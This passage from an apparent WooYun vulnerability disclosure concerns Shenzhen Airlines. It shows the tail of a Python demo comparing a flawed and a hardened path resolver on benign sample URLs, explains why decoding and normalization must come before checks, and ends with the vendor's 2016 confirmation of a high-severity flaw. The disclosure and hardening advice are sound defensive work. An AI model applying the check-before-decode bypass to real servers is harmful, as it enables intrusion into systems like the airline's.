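        "/servlet/PaymentServlet",   # constructed: ordinary request
        "/%E6%9C%BA%E7%A5%A8.html",  # constructed: legitimate multi-byte UTF-8
    ]
    for s in samples:
        print(f"{s:28} flawed={flawed_resolve(s)} hardened={hardened_resolve(s)}")
```

The hardened order matters as much as the strict decoder: a check that runs before decoding and normalization sees a different string than the one the file lookup finally uses.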

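Copyright notice: when reposting, please credit the source: 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-05-11 09:20

Vendor reply:

Thank you for your attention to and help with Shenzhen Airlines' information systems. We will investigate the application and patch the vulnerability as soon as possible.

Latest status:

None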

